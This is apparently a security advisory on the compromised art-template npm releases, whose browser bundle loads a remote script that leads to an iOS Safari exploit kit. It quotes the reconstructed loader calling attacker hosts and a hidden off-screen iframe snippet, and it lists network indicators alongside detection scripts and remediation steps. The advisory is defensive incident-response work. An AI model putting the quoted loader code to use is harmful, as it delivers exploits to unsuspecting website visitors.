Severity: critical
CVE: CVE-2024-23222
CWE: CWE-506
Affected Surface: art-template 4.13.3, art-template 4.13.5, art-template 4.13.6; browser bundles that include lib/template-web.js from affected art-template releases; sites serving bundled art-template code to Safari or iOS users; companion packages controlled by the changed npm maintainer set: express-art-template, art-template-loader, and koa-art-template
On 20 May 2026, Socket and SafeDep published analysis of a compromise in the npm package art-template, a long-standing JavaScript templating library. This incident is unusual because the malicious code was not an install-time developer credential stealer. It was appended to the browser bundle and executed in the browsers of downstream application users.
The affected package is art-template. The last known clean release is 4.13.2. Confirmed malicious releases are:
- art-template@4.13.3
- art-template@4.13.5
- art-template@4.13.6
SafeDep also identified 4.13.4 as an unauthorized release, but did not find the same browser-bundle injection in that version. Treat it as untrusted for provenance purposes, but prioritize the three injected versions when looking for runtime impact.
Why this matters
Most recent npm supply-chain incidents have targeted developer workstations, CI runners, and publish tokens through preinstall, postinstall, or import-time execution. The art-template compromise targets a different trust boundary: users who visit websites built with a poisoned frontend dependency.
If an application bundled the affected lib/template-web.js file and served it to users, the malicious loader ran in the page’s origin. That gives the attacker the same browser capabilities as any other script on the site: cookie access where cookies are not HttpOnly, local storage access, DOM manipulation, redirects, iframe injection, and further payload staging. Socket and SafeDep both tie the final chain to a Coruna-like iOS exploit framework targeting Safari/WebKit.
Injection point
The malicious code is appended to lib/template-web.js, the browser-side bundle. Server-side Node.js consumers that only require the package’s Node entry point are not directly exposed to this browser payload, but repositories should still remove the affected artifacts because builds often copy browser bundles into static assets.
For 4.13.5, SafeDep reconstructs the appended code as:
function loadScript(url) {
const script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.head.appendChild(script);
}
loadScript('https://v3.jiathis.com/code/jia.js?uid=artemplate');
Version 4.13.6 keeps the same primitive and changes the URL:
loadScript('https://v3.jiathis.com/code/art.js');
Version 4.13.3 used a more obfuscated String.fromCharCode loader. The decoded target was hxxps://git.youzzjizz[.]com/git.js. That earlier package was also partially broken because the tarball omitted expected server-side files, but the standalone browser bundle could still execute if a site consumed it directly.
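The three injected versions share one primitive (create a script element, point it at a remote URL, append it to head) and differ only in how the URL is spelled: a plain literal in 4.13.5 and 4.13.6, a String.fromCharCode sequence in 4.13.3. A scanner that only greps for domains misses the encoded form. The Node script below is an added example, not code from Socket, SafeDep or the art-template project: it decodes every String.fromCharCode call with literal numeric arguments, checks both the raw and decoded text against the reported hosts, and separately flags the generic loader primitive, which a templating library has no reason to contain. The sample bundles are constructed stand-ins; the 4.13.3 sample models the description above rather than reproducing the actual obfuscated bytes.

```javascript
// Added example: scan a browser bundle for the appended loader and the
// reported hosts. Not code from Socket, SafeDep or the art-template project.
const IOC_HOSTS = [
  'v3.jiathis.com',        // jia.js / art.js first stage (4.13.5, 4.13.6)
  'git.youzzjizz.com',     // git.js first stage (4.13.3, fromCharCode-obfuscated)
  'utaq.cfww.shop',        // iPhone-only hidden iframe
  'l1ewsu3yjkqeroy.xyz',   // ip-sync endpoint
];

// Decode every String.fromCharCode(n, n, ...) call whose arguments are all
// numeric literals; the 4.13.3 loader hid its URL this way.
function decodeFromCharCode(source) {
  const re = /String\.fromCharCode\(\s*([0-9][0-9,\s]*)\)/g;
  const decoded = [];
  let m;
  while ((m = re.exec(source)) !== null) {
    const codes = m[1].split(',').map((s) => s.trim()).filter(Boolean).map(Number);
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Returns { iocs: [{ host, via }], loaderPrimitive: bool }. loaderPrimitive is
// the generic signal: template code should never build <script> tags and
// append them to <head> or <body>, whatever URL they point at.
function scanBundle(source) {
  const decoded = decodeFromCharCode(source);
  const iocs = [];
  for (const host of IOC_HOSTS) {
    if (source.includes(host)) iocs.push({ host, via: 'literal' });
    else if (decoded.some((s) => s.includes(host))) iocs.push({ host, via: 'fromCharCode' });
  }
  const loaderPrimitive =
    /createElement\(\s*['"]script['"]\s*\)/.test(source) &&
    /\.(head|body)\.appendChild\(/.test(source);
  return { iocs, loaderPrimitive };
}

// Constructed samples: a stand-in for the UMD wrapper of template-web.js, a
// 4.13.5-style literal append, and a fromCharCode-obfuscated append modelled on
// the 4.13.3 description (the real 4.13.3 bytes are not reproduced here).
const CLEAN_STUB =
  '!function(e,t){"object"==typeof exports?module.exports=t():e.template=t()}' +
  '(this,function(){return function template(id,data){return id}});\n';
const APPENDED_4135 = CLEAN_STUB +
  "function loadScript(url){const s=document.createElement('script');s.src=url;" +
  "document.head.appendChild(s);}\nloadScript('https://v3.jiathis.com/code/jia.js?uid=artemplate');\n";
const obfuscatedUrl = Array.from('https://git.youzzjizz.com/git.js', (c) => c.charCodeAt(0)).join(',');
const APPENDED_4133 = CLEAN_STUB +
  `var u=String.fromCharCode(${obfuscatedUrl});var s=document.createElement("script");` +
  's.src=u;document.head.appendChild(s);\n';

if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, src] of [['clean', CLEAN_STUB], ['4.13.5-style', APPENDED_4135], ['4.13.3-style', APPENDED_4133]]) {
    console.log(label, JSON.stringify(scanBundle(src)));
  }
}
```

Run it against every copy of template-web.js found in node_modules, build output, and CDN uploads; a hit on loaderPrimitive without a known host is still worth a manual look, since the next variant will change the URL before it changes the primitive.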
Delivery chain
The browser-side chain reported by Socket and SafeDep is:
art-template@4.13.5 or 4.13.6
-> lib/template-web.js appends loadScript(...)
-> hxxps://v3.jiathis[.]com/code/jia.js or art.js
-> Baidu Analytics is injected for all visitors
-> iPhone user agents receive a hidden iframe
-> hxxps://utaq[.]cfww[.]shop/gooll/gooll.html
-> 49554fde7424c31c.js
-> Safari/iOS fingerprinting and remote module dispatch
The first-stage remote script is reportedly gated. SafeDep observed that a request without a Referer header returned a near-empty response, while a browser-like script load with Referer returned the full JavaScript payload. That kind of server-side filtering makes simple IOC fetches and sandbox crawlers less reliable.
The iPhone-specific stage creates a zero-size, off-screen iframe and places it inside a closed Shadow DOM root. The iframe construction, as reconstructed (the shadow-root attach is not reproduced in this excerpt), is:
var isIphone = /iPhone/i.test(navigator.userAgent);
if (!isIphone) return;
var frame = document.createElement('iframe');
frame.src = atob('aHR0cHM6Ly91dGFxLmNmd3cuc2hvcC8=');
Object.assign(frame.style, {
width: '0px',
height: '0px',
border: 'none',
position: 'fixed',
top: '-1000px',
left: '-1000px',
});
That design hides the payload from visual inspection and from simple DOM queries that do not pierce a closed shadow root.
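querySelectorAll cannot see into a closed shadow root, so a page-level sweep for suspicious iframes comes back empty unless the root was captured when it was created. The added example below (not code from the original reporting) does that: it wraps Element.prototype.attachShadow so every root, closed or open, stays reachable, then sweeps the document and the recorded roots for frames with a collapsed box or a negative fixed offset, the exact styling used by the loader above. The hook only helps if it is installed before the page's own scripts run (as the first inline script, an extension content script at document_start, or page.evaluateOnNewDocument in an instrumented browser); for a page that is already loaded, browser DevTools still display closed roots and the network log still shows the frame request. The fake DOM objects are constructed so the logic runs outside a browser.

```javascript
// Added example (not from Socket, SafeDep or art-template): find hidden
// iframes, including ones parked in closed shadow roots.
const SHADOW_ROOTS = [];

// Wrap attachShadow so every root, closed or not, stays reachable for triage.
// Must run before any page script that calls attachShadow.
function hookAttachShadow(proto) {
  const original = proto.attachShadow;
  proto.attachShadow = function (init) {
    const root = original.call(this, init);
    SHADOW_ROOTS.push({ root, host: this, mode: init && init.mode });
    return root;
  };
}

function px(value) {
  const n = parseFloat(value);
  return Number.isFinite(n) ? n : null;
}

// The loader above hides its frame with width/height 0px and position:fixed at
// -1000px; treat either a collapsed box or a negative fixed offset as hidden.
function isHiddenFrame(frame) {
  const s = frame.style || {};
  const w = px(s.width), h = px(s.height);
  const collapsed = (w !== null && w <= 1) || (h !== null && h <= 1);
  const offscreen = s.position === 'fixed' && ((px(s.top) ?? 0) < 0 || (px(s.left) ?? 0) < 0);
  return collapsed || offscreen;
}

// documentRoot is document (anything with querySelectorAll); shadowRoots are the
// entries recorded by the hook. Returns one record per suspicious frame.
function findHiddenFrames(documentRoot, shadowRoots) {
  const found = [];
  for (const frame of documentRoot.querySelectorAll('iframe')) {
    if (isHiddenFrame(frame)) found.push({ src: frame.src, shadow: null });
  }
  for (const entry of shadowRoots) {
    for (const frame of entry.root.querySelectorAll('iframe')) {
      if (isHiddenFrame(frame)) found.push({ src: frame.src, shadow: entry.mode });
    }
  }
  return found;
}

// Constructed stand-ins for document / shadow roots / iframe elements.
function fakeRoot(frames) {
  return { querySelectorAll: (sel) => (sel === 'iframe' ? frames : []) };
}
const VISIBLE_FRAME = { src: 'https://www.example.com/embed', style: { width: '640px', height: '360px' } };
const HIDDEN_FRAME = {
  src: 'https://utaq.cfww.shop/',
  style: { width: '0px', height: '0px', border: 'none', position: 'fixed', top: '-1000px', left: '-1000px' },
};

// Simulates a page script that, after the hook is in place, attaches a closed
// shadow root and drops the hidden frame inside it.
function runDemo() {
  SHADOW_ROOTS.length = 0;
  const fakeProto = { attachShadow: () => fakeRoot([HIDDEN_FRAME]) };
  hookAttachShadow(fakeProto);
  const host = Object.create(fakeProto);
  host.attachShadow({ mode: 'closed' });               // attacker-style call
  return findHiddenFrames(fakeRoot([VISIBLE_FRAME]), SHADOW_ROOTS);
}

if (typeof document !== 'undefined') {
  hookAttachShadow(Element.prototype);                 // real browser: install as early as possible
} else if (typeof require !== 'undefined' && require.main === module) {
  console.log(runDemo());
}
```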
Exploit-kit behavior
Socket’s analysis describes the final 49554fde7424c31c.js loader as a Safari/WebKit gate that rejects Chrome, Firefox, Edge, Android, and iOS versions outside the selected ranges. SafeDep’s deeper module analysis links the chain to the Coruna iOS exploit kit documented by Google TAG.
The reported targeting window includes iOS 11 through iOS 17.2, with a hard cutoff at iOS 17.3 and later. That cutoff is important because CVE-2024-23222, a JavaScriptCore type confusion issue used by Coruna's newer chain, was patched by Apple in iOS 17.3 (January 2024).
Technical behaviors reported across the loader and remote modules include:
- Safari and WebKit user-agent gating.
- WebRTC, WebGL, MathML, IndexedDB, touch, and automation checks.
- WebAssembly-based fingerprinting and proof-of-work style validation.
- Per-version memory-layout offsets for JIT output checks.
- Content-addressed remote module loading through derived SHA-256 paths.
- ARM64/arm64e architecture branching.
- Native shellcode that references ptrace, mmap, mprotect, Mach traps, and Apple frameworks.
This is not an ad-injection or analytics-only incident. A poisoned frontend package can become a browser exploit delivery surface for every user who loads the affected bundle.
Package ownership risk
SafeDep reports that the original npm maintainer no longer appears on art-template or related packages. The changed maintainer set also controls companion packages:
- express-art-template
- art-template-loader
- koa-art-template
Those packages had not received new malicious versions in the public reporting reviewed here, but ownership control matters. Organizations that still depend on this ecosystem should pin known-clean versions, mirror artifacts internally, and avoid automatic promotion of new releases from the changed maintainer set until ownership is resolved.
Indicators
Package indicators:
- art-template@4.13.3
- art-template@4.13.5
- art-template@4.13.6
- lib/template-web.js containing v3.jiathis[.]com
- lib/template-web.js containing git.youzzjizz[.]com
Network and payload indicators reported by Socket and SafeDep:
- v3[.]jiathis[.]com/code/jia.js
- v3[.]jiathis[.]com/code/art.js
- git[.]youzzjizz[.]com/git.js
- utaq[.]cfww[.]shop
- utaq[.]cfww[.]shop/gooll/gooll.html
- l1ewsu3yjkqeroy[.]xyz/api/ip-sync/sync
- hm[.]baidu[.]com/hm.js?7d86eb847ecfd3c972fa457a6abaa0da
- 49554fde7424c31c.js, SHA-256 f31bdd069fe7966ae11be1f78ee5dd44445938856dd1df12379e0e84a6851f5c
Remediation
Pin art-template to 4.13.2 or remove the dependency. Search package manifests, lockfiles, package-manager caches, deployed bundles, static asset directories, CDN uploads, and build artifacts for the affected versions and for the injected domains.
Useful searches (the version pattern only matches the name@version form used by yarn.lock and npm ls output; package-lock.json keeps the version on a separate "version" line, so check the art-template entry there directly):
rg "art-template@?4\\.13\\.(3|5|6)|v3\\.jiathis|git\\.youzzjizz|utaq\\.cfww|l1ewsu3yjkqeroy" .
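A text search is a good first pass, but it misses package-lock.json (where the name and version sit on different lines) and cannot tell a malicious version from an untrusted or clean one. The Node script below is an added example, not tooling from Socket, SafeDep or the art-template project: it walks package-lock.json in both lockfileVersion 1 (nested dependencies) and 2/3 (packages keyed by install path) form, parses the yarn.lock v1 text format, and classifies each hit as malicious (4.13.3, 4.13.5, 4.13.6), untrusted (4.13.4), clean, or watch (the three companion packages, which are flagged for provenance review regardless of version). The lockfile fragments are constructed for the example.

```javascript
// Added example: lockfile-aware audit for the affected art-template releases.
// Not code from Socket, SafeDep or the art-template project.
const AFFECTED = new Set(['4.13.3', '4.13.5', '4.13.6']); // injected lib/template-web.js
const UNTRUSTED = new Set(['4.13.4']);                     // unauthorized release, no injection found
const WATCHLIST = ['art-template', 'express-art-template', 'art-template-loader', 'koa-art-template'];

function classify(name, version) {
  if (name !== 'art-template') return 'watch';   // companion packages: provenance review
  if (AFFECTED.has(version)) return 'malicious';
  if (UNTRUSTED.has(version)) return 'untrusted';
  return 'clean';
}

function record(hits, name, version, where) {
  if (WATCHLIST.includes(name)) hits.push({ name, version, status: classify(name, version), where });
}

// lockfileVersion 1: a nested "dependencies" tree, one level per node_modules.
function walkV1(deps, prefix, hits) {
  for (const [name, entry] of Object.entries(deps)) {
    const path = `${prefix}node_modules/${name}`;
    record(hits, name, entry.version, path);
    if (entry.dependencies) walkV1(entry.dependencies, `${path}/`, hits);
  }
}

function auditPackageLock(lock) {
  const hits = [];
  if (lock.packages) {                       // lockfileVersion 2 and 3
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (!path) continue;                   // "" is the root project itself
      const name = entry.name || path.slice(path.lastIndexOf('node_modules/') + 'node_modules/'.length);
      record(hits, name, entry.version, path);
    }
  } else if (lock.dependencies) {
    walkV1(lock.dependencies, '', hits);
  }
  return hits;
}

// yarn.lock v1: an unindented "name@range[, name@range]:" header followed by an
// indented version line. The first selector is enough to recover the name.
function auditYarnLock(text) {
  const hits = [];
  let current = null;
  for (const line of text.split(/\r?\n/)) {
    if (/^\S/.test(line) && line.endsWith(':')) {
      const selector = line.slice(0, -1).split(',')[0].trim().replace(/^"|"$/g, '');
      const at = selector.lastIndexOf('@');  // lastIndexOf keeps "@scope/name" intact
      current = at > 0 ? selector.slice(0, at) : selector;
      continue;
    }
    const m = current && line.match(/^\s+version\s+"?([^"\s]+)"?/);
    if (m) { record(hits, current, m[1], 'yarn.lock'); current = null; }
  }
  return hits;
}

// Constructed sample lockfiles.
const SAMPLE_PACKAGE_LOCK = {
  name: 'demo-app', lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', dependencies: { 'art-template': '^4.13.0' } },
    'node_modules/art-template': { version: '4.13.5', resolved: 'https://registry.npmjs.org/art-template/-/art-template-4.13.5.tgz' },
    'node_modules/express-art-template': { version: '1.0.1' },
    'node_modules/lodash': { version: '4.17.21' },
  },
};
const SAMPLE_YARN_LOCK = [
  '# yarn lockfile v1', '',
  'art-template@^4.13.0:', '  version "4.13.2"',
  '  resolved "https://registry.yarnpkg.com/art-template/-/art-template-4.13.2.tgz"', '',
  '"koa-art-template@^1.1.1":', '  version "1.1.1"', '',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditPackageLock(SAMPLE_PACKAGE_LOCK));
  console.log(auditYarnLock(SAMPLE_YARN_LOCK));
}
```

To run it over a real repository, JSON.parse the package-lock.json and read yarn.lock as text, then feed them to the two functions; a "watch" hit is not a finding by itself, it is a reminder to pin that companion package and verify its provenance before accepting any new release.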
For web applications that may have served the affected bundle, response should include both dependency cleanup and user-impact review:
- Rebuild and redeploy static assets from a clean lockfile.
- Invalidate CDN and edge caches containing affected bundles.
- Review access logs for requests to the affected JavaScript bundle during the exposure window.
- Enforce a Content-Security-Policy whose script-src and frame-src allowlists name only the origins the site legitimately loads scripts and frames from, so that v3.jiathis[.]com and utaq[.]cfww[.]shop are blocked and reported. CSP is an allowlist, not a blocklist, and it cannot stop the appended loader itself, which ships inside the site's own bundle; what it stops is the remote script fetch and the hidden iframe.
- Review client-side telemetry for iOS/Safari users redirected through the iframe chain.
If the affected bundle was served from an authenticated application, rotate any tokens stored in JavaScript-readable cookies or browser storage. Even if exploit delivery was iOS-gated, the injected script executed in the site’s origin before the chain selected victims.